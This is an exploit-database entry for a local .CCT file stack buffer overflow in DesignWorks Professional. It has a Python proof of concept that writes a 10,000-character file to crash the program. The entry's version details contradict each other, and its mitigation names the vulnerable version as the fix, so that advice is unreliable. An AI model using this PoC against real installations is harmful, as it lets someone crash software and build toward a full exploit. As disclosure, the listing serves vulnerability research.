Local .CCT File Stack Buffer Overflow (PoC)

vendor:

DesignWorks Professional

by:

Cn4phux

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: DesignWorks Professional

Affected Version From: 4.3.2001

Affected Version To: 4.3.2001

Patch Exists: Yes

Related CWE: N/A

CPE: a:designworks_solutions:designworks_professional

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

Local .CCT File Stack Buffer Overflow (PoC)

DesignWorks Professional 4.3.1 is vulnerable to a local stack buffer overflow. The vulnerability is triggered when a specially crafted .CCT file is opened. This PoC creates a file with 10,000 'A' characters, which when opened in DesignWorks Professional 4.3.1, causes a stack buffer overflow.

Mitigation:

Upgrade to the latest version of DesignWorks Professional 4.3.1

Source

Exploit-DB raw data:

#
#                          I'm Cn4phux
#                  ------  |      ______ _____   (--, __*__  ______
#                  |____|  |  Â¤   |    | |       | ! )  |    |     |
#                [ |    |` |      | <> | |-----> |__/   |    |  Â¤  | ]
#                  | .. |  |____! |____| |____   |\     |    |-----|
#                                      |        _| \  -----  | ::: |
#                                      |         |  \
#                                |_____|         |   \
#                                                |
#                                                |
#                                               ,|.
#                                              / | \
#                                             |  |  |
#                                             |  _  |
#                                           `._\/.\/_,'
#                                             _( 8 )_
#                                            / '_ _' \
#                                           |  /{_}\  |
#                                           ` |  "  | `
#                                             |     |
#
#
# [+] Application               : DesignWorks Professional 4.3.1
#
# [+] Application's Description : (" DesignWorks Professional Schematic Capture for Windows...,Google-it.)
#
# [+] Bug                       : Local .CCT File Stack Buffer Overflow (PoC)
#
# [+] Author                    : Cn4phux
#
import sys
import os
print "[x] Local Stack Overflow PoC"
try:
   milef = open("x2.cct",'w')
  
except IOError, e:
    print "Unable to open file ", e
    sys.exit(0)
print "[x] File sucessfully opened for writing."
try:
   milef.write("A" * 10000)
except IOError, e:
   
    print "Unable to write to file ", e
    sys.exit(0)
   
print "[x] Exploit successfully written."
milef.close()
print "[x] ."
print "\n[x] Cn4phux made in DZ, Great'z to all Algerians. /Google.dz"

# milw0rm.com [2008-12-06]